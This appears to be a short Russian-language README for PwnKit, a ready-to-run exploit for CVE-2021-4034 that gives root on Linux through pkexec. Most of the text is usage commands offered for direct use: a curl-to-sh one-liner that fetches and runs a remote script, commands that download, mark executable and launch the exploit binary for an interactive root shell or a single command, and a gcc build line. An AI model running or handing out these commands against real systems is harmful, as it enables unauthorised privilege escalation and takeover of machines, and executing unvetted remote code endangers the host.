
Автономный эксплойт для CVE-2021-4034 - Pkexec Локальное повышение привилегий
Автономный эксплойт для CVE-2021-4034 - локальное повышение привилегий через Pkexec
Должен работать из коробки на уязвимых дистрибутивах Linux на основе Ubuntu, Debian, Fedora и CentOS.
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

Запуск эксплойта против запатченных версий выдаст следующий результат.

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC